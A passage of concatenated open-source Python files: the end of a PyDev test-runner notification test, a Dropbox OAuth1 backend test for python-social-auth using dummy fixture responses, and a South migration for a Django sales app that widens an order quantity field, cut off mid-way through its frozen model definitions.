            def __init__(self, notifications):
                self.notifications = notifications
            def notifyConnected(self):
                #This method is called at the very start (in runfiles.py), and we do not check this here
                raise AssertionError('Should not be called from the run tests.')
            def notifyTestsCollected(self, number_of_tests):
                self.notifications.append(('notifyTestsCollected', number_of_tests))
            def notifyStartTest(self, file, test):
                pass
            def notifyTest(self, cond, captured_output, error_contents, file, test, time):
                try:
                    #I.e.: when marked as Binary in xml-rpc
                    captured_output = captured_output.data
                except:
                    pass
                try:
                    #I.e.: when marked as Binary in xml-rpc
                    error_contents = error_contents.data
                except:
                    pass
                # Keep only the last (message) line of any error text so the
                # comparison is stable regardless of the traceback above it.
                if error_contents:
                    error_contents = error_contents.splitlines()[-1].strip()
                self.notifications.append(('notifyTest', cond, captured_output.strip(), error_contents, file, test))
            def notifyTestRunFinished(self, total_time):
                self.notifications.append(('notifyTestRunFinished',))
        server = Server(notifications)
        pydev_runfiles_xml_rpc.set_server(server)
        simple_test = os.path.join(self.file_dir[0], 'simple_test.py')
        simple_test2 = os.path.join(self.file_dir[0], 'simple2_test.py')
        simpleClass_test = os.path.join(self.file_dir[0], 'simpleClass_test.py')
        simpleModule_test = os.path.join(self.file_dir[0], 'simpleModule_test.py')
        # Map each sample file to the explicit test names that should be run.
        files_to_tests = {}
        files_to_tests.setdefault(simple_test , []).append('SampleTest.test_xxxxxx1')
        files_to_tests.setdefault(simple_test , []).append('SampleTest.test_xxxxxx2')
        files_to_tests.setdefault(simple_test , []).append('SampleTest.test_non_unique_name')
        files_to_tests.setdefault(simple_test2, []).append('YetAnotherSampleTest.test_abc')
        files_to_tests.setdefault(simpleClass_test, []).append('SetUpClassTest.test_blank')
        files_to_tests.setdefault(simpleModule_test, []).append('SetUpModuleTest.test_blank')
        self._setup_scenario(None, files_to_tests=files_to_tests)
        self.MyTestRunner.verbosity = 2
        # Capture stdout so the "Ran N tests in" summary can be checked below.
        buf = pydevd_io.start_redirect(keep_original_redirection=False)
        try:
            self.MyTestRunner.run_tests()
            self.assertEqual(8, len(notifications))
            expected = [
                ('notifyTestsCollected', 6),
                ('notifyTest', 'ok', 'non unique name ran', '', simple_test, 'SampleTest.test_non_unique_name'),
                ('notifyTest', 'fail', '', 'AssertionError: Fail test 2', simple_test, 'SampleTest.test_xxxxxx1'),
                ('notifyTest', 'ok', '', '', simple_test, 'SampleTest.test_xxxxxx2'),
                ('notifyTest', 'ok', '', '', simple_test2, 'YetAnotherSampleTest.test_abc'),
            ]
            if not IS_JYTHON:
                # setUpClass/setUpModule raise intentionally on CPython; the
                # reported test id differs depending on whether the module was
                # imported with the 'samples.' package prefix.
                if 'samples.simpleClass_test' in str(notifications):
                    expected.append(('notifyTest', 'error', '', 'ValueError: This is an INTENTIONAL value error in setUpClass.',
                        simpleClass_test.replace('/', os.path.sep), 'samples.simpleClass_test.SetUpClassTest <setUpClass>'))
                    expected.append(('notifyTest', 'error', '', 'ValueError: This is an INTENTIONAL value error in setUpModule.',
                        simpleModule_test.replace('/', os.path.sep), 'samples.simpleModule_test <setUpModule>'))
                else:
                    expected.append(('notifyTest', 'error', '', 'ValueError: This is an INTENTIONAL value error in setUpClass.',
                        simpleClass_test.replace('/', os.path.sep), 'simpleClass_test.SetUpClassTest <setUpClass>'))
                    expected.append(('notifyTest', 'error', '', 'ValueError: This is an INTENTIONAL value error in setUpModule.',
                        simpleModule_test.replace('/', os.path.sep), 'simpleModule_test <setUpModule>'))
            else:
                # On Jython those two tests are expected to simply pass.
                expected.append(('notifyTest', 'ok', '', '', simpleClass_test, 'SetUpClassTest.test_blank'))
                expected.append(('notifyTest', 'ok', '', '', simpleModule_test, 'SetUpModuleTest.test_blank'))
            expected.append(('notifyTestRunFinished',))
            expected.sort()
            # The output/error fields of 6-tuples arrive latin1-encoded (see
            # "binary on Py3" note below), so encode the expected values the
            # same way before comparing.
            new_notifications = []
            for notification in expected:
                try:
                    if len(notification) == 6:
                        # Some are binary on Py3.
                        new_notifications.append((
                            notification[0],
                            notification[1],
                            notification[2].encode('latin1'),
                            notification[3].encode('latin1'),
                            notification[4],
                            notification[5],
                        ))
                    else:
                        new_notifications.append(notification)
                except:
                    raise
            expected = new_notifications
            notifications.sort()
            self.assertEqual(
                expected,
                notifications
            )
        finally:
            pydevd_io.end_redirect()
        b = buf.getvalue()
        if not IS_JYTHON:
            self.assert_(b.find('Ran 4 tests in ') != -1, 'Found: ' + b)
        else:
            self.assert_(b.find('Ran 6 tests in ') != -1, 'Found: ' + b)
if __name__ == "__main__":
    #This is so that we can run it from the jython tests -- because we don't actually have a __main__ module
    #(so, it won't try importing the __main__ module)
    unittest.TextTestRunner().run(unittest.makeSuite(RunfilesTest))
| apache-2.0 |
ehashman/oh-mainline | vendor/packages/python-social-auth/social/tests/backends/test_dropbox.py | 92 | 1042 | import json
from social.p3 import urlencode
from social.tests.backends.oauth import OAuth1Test
class DropboxOAuth1Test(OAuth1Test):
    """Exercise the Dropbox OAuth1 backend against canned HTTP responses.

    The class attributes below are fixtures consumed by the OAuth1Test base
    class, which mocks the corresponding HTTP endpoints.
    """
    backend_path = 'social.backends.dropbox.DropboxOAuth'
    # Endpoint the backend queries for the authenticated user's profile.
    user_data_url = 'https://api.dropbox.com/1/account/info'
    # Username the pipeline should end up with -- presumably derived from the
    # 'uid' field in user_data_body below; verify against the backend.
    expected_username = '10101010'
    # Canned JSON body for the access-token exchange.
    access_token_body = json.dumps({
        'access_token': 'foobar',
        'token_type': 'bearer'
    })
    # Canned form-encoded body for the initial request-token step.
    request_token_body = urlencode({
        'oauth_token_secret': 'foobar-secret',
        'oauth_token': 'foobar',
        'oauth_callback_confirmed': 'true'
    })
    # Canned JSON profile returned by user_data_url.
    user_data_body = json.dumps({
        'referral_link': 'https://www.dropbox.com/referrals/foobar',
        'display_name': 'Foo Bar',
        'uid': 10101010,
        'country': 'US',
        'quota_info': {
            'shared': 138573,
            'quota': 2952790016,
            'normal': 157327
        },
        'email': 'foo@bar.com'
    })
    def test_login(self):
        """Run the full login flow against the mocked endpoints."""
        self.do_login()
    def test_partial_pipeline(self):
        """Run the login flow with a partial (interrupted) pipeline."""
        self.do_partial_pipeline()
| agpl-3.0 |
alejo8591/maker | sales/migrations/0004_auto__chg_field_orderedproduct_quantity.py | 1 | 29356 | # encoding: utf-8
# Copyright 2013 maker
# License
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
    """South schema migration for the ``sales`` app.

    Widens ``OrderedProduct.quantity`` on the ``sales_orderedproduct`` table
    from ``DecimalField(max_digits=4, decimal_places=2)`` to
    ``DecimalField(max_digits=30, decimal_places=2)``.
    """
    def forwards(self, orm):
        """Apply the migration: widen the ``quantity`` column to 30 digits."""
        # Changing field 'OrderedProduct.quantity'
        db.alter_column('sales_orderedproduct', 'quantity', self.gf('django.db.models.fields.DecimalField')(max_digits=30, decimal_places=2))
    def backwards(self, orm):
        """Revert the migration: restore the original 4-digit column.

        NOTE(review): values wider than 4 digits written after forwards() was
        applied will not fit when reverting; behavior (error vs. truncation)
        depends on the database backend.
        """
        # Changing field 'OrderedProduct.quantity'
        db.alter_column('sales_orderedproduct', 'quantity', self.gf('django.db.models.fields.DecimalField')(max_digits=4, decimal_places=2))
    # Frozen ORM snapshot auto-generated by South at the time this migration
    # was created; it is exposed to forwards()/backwards() via the ``orm``
    # argument. Do not edit by hand -- regenerate with
    # ``manage.py schemamigration`` instead.
    models = {
        'auth.group': {
            'Meta': {'object_name': 'Group'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        'auth.permission': {
            'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        'auth.user': {
            'Meta': {'object_name': 'User'},
            'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
            'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
            'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
            'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
        },
        'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        'core.accessentity': {
            'Meta': {'object_name': 'AccessEntity'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
        },
        'core.comment': {
            'Meta': {'object_name': 'Comment'},
            'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.User']", 'null': 'True', 'blank': 'True'}),
            'body': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'dislikes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments_disliked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'likes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments_liked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"})
        },
        'core.group': {
            'Meta': {'ordering': "['name']", 'object_name': 'Group', '_ormbases': ['core.AccessEntity']},
            'accessentity_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.AccessEntity']", 'unique': 'True', 'primary_key': 'True'}),
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['core.Group']"})
        },
        'core.object': {
            'Meta': {'object_name': 'Object'},
            'comments': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.Comment']"}),
            'creator': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'objects_created'", 'null': 'True', 'to': "orm['core.User']"}),
            'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'dislikes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_disliked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
            'full_access': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_full_access'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.AccessEntity']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'likes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_liked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
            'links': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'links_rel_+'", 'null': 'True', 'to': "orm['core.Object']"}),
            'nuvius_resource': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'object_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
            'object_type': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
            'read_access': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_read_access'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.AccessEntity']"}),
            'subscribers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'subscriptions'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
            'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['core.Tag']", 'null': 'True', 'blank': 'True'}),
            'trash': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
        },
        'core.tag': {
            'Meta': {'ordering': "['name']", 'object_name': 'Tag'},
            'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '512'})
        },
        'core.user': {
            'Meta': {'ordering': "['name']", 'object_name': 'User', '_ormbases': ['core.AccessEntity']},
            'accessentity_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.AccessEntity']", 'unique': 'True', 'primary_key': 'True'}),
            'default_group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'default_user_set'", 'null': 'True', 'to': "orm['core.Group']"}),
            'disabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'last_access': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'other_groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['core.Group']", 'null': 'True', 'blank': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
        },
        'finance.account': {
            'Meta': {'ordering': "['name']", 'object_name': 'Account', '_ormbases': ['core.Object']},
            'balance': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
            'balance_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
            'balance_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"})
        },
        'finance.category': {
            'Meta': {'object_name': 'Category', '_ormbases': ['core.Object']},
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'})
        },
        'finance.currency': {
            'Meta': {'object_name': 'Currency', '_ormbases': ['core.Object']},
            'code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
            'factor': ('django.db.models.fields.DecimalField', [], {'default': '1', 'max_digits': '10', 'decimal_places': '4'}),
            'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'symbol': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'})
        },
        'finance.liability': {
            'Meta': {'ordering': "['-due_date']", 'object_name': 'Liability', '_ormbases': ['core.Object']},
            'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Account']"}),
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Category']", 'null': 'True', 'blank': 'True'}),
            'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'due_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_liability_source'", 'to': "orm['identities.Contact']"}),
            'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_liability_target'", 'to': "orm['identities.Contact']"}),
            'value': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
            'value_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
            'value_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
        },
        'finance.tax': {
            'Meta': {'object_name': 'Tax', '_ormbases': ['core.Object']},
            'compound': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '2'})
        },
        'finance.transaction': {
            'Meta': {'ordering': "['-datetime']", 'object_name': 'Transaction', '_ormbases': ['core.Object']},
            'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Account']"}),
            'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Category']", 'null': 'True', 'blank': 'True'}),
            'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'liability': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Liability']", 'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_transaction_source'", 'to': "orm['identities.Contact']"}),
            'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_transaction_target'", 'to': "orm['identities.Contact']"}),
            'value': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
            'value_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
            'value_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
        },
        'identities.contact': {
            'Meta': {'ordering': "['name']", 'object_name': 'Contact', '_ormbases': ['core.Object']},
            'contact_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.ContactType']"}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['identities.Contact']"}),
            'related_user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.AccessEntity']", 'null': 'True', 'blank': 'True'})
        },
        'identities.contactfield': {
            'Meta': {'ordering': "['name']", 'object_name': 'ContactField', '_ormbases': ['core.Object']},
            'allowed_values': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'field_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
            'label': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
        },
        'identities.contacttype': {
            'Meta': {'ordering': "['name']", 'object_name': 'ContactType', '_ormbases': ['core.Object']},
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['identities.ContactField']", 'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'slug': ('django.db.models.fields.CharField', [], {'max_length': '256'})
        },
        'sales.lead': {
            'Meta': {'ordering': "['contact']", 'object_name': 'Lead', '_ormbases': ['core.Object']},
            'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_lead_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
            'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"}),
            'contact_method': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'products_interested': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sales.Product']", 'null': 'True', 'blank': 'True'}),
            'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']", 'null': 'True', 'blank': 'True'}),
            'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"})
        },
        'sales.opportunity': {
            'Meta': {'ordering': "['-expected_date']", 'object_name': 'Opportunity', '_ormbases': ['core.Object']},
            'amount': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
            'amount_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
            'amount_display': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
            'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_opportunity_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
            'closed_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
            'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"}),
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'expected_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
            'lead': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Lead']", 'null': 'True', 'blank': 'True'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'probability': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '3', 'decimal_places': '0', 'blank': 'True'}),
            'products_interested': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sales.Product']", 'symmetrical': 'False'}),
            'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']", 'null': 'True', 'blank': 'True'}),
            'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"})
        },
        'sales.orderedproduct': {
            'Meta': {'ordering': "['product']", 'object_name': 'OrderedProduct', '_ormbases': ['core.Object']},
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'discount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '4', 'decimal_places': '2'}),
            'fulfilled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleOrder']"}),
            'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Product']"}),
            'quantity': ('django.db.models.fields.DecimalField', [], {'default': '1', 'max_digits': '30', 'decimal_places': '2'}),
            'rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
            'rate_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
            'subscription': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Subscription']", 'null': 'True', 'blank': 'True'}),
            'tax': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Tax']", 'null': 'True', 'blank': 'True'})
        },
        'sales.product': {
            'Meta': {'ordering': "['code']", 'object_name': 'Product', '_ormbases': ['core.Object']},
            'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'buy_price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
            'code': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['sales.Product']"}),
            'product_type': ('django.db.models.fields.CharField', [], {'default': "'good'", 'max_length': '32'}),
            'runout_action': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
            'sell_price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
            'stock_quantity': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
            'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
            'supplier_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
        },
        'sales.saleorder': {
            'Meta': {'ordering': "['-datetime']", 'object_name': 'SaleOrder', '_ormbases': ['core.Object']},
            'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_saleorder_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
            'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
            'currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
            'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
            'opportunity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Opportunity']", 'null': 'True', 'blank': 'True'}),
            'payment': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['finance.Transaction']", 'null': 'True', 'blank': 'True'}),
            'reference': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
            'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']"}),
            'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"}),
            'total': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
            'total_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
        },
        'sales.salesource': {
            'Meta': {'ordering': "('-active', 'name')", 'object_name': 'SaleSource', '_ormbases': ['core.Object']},
            'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
            'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'})
        },
        'sales.salestatus': {
            'Meta': {'ordering': "('hidden', '-active', 'name')", 'object_name': 'SaleStatus', '_ormbases': ['core.Object']},
            'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
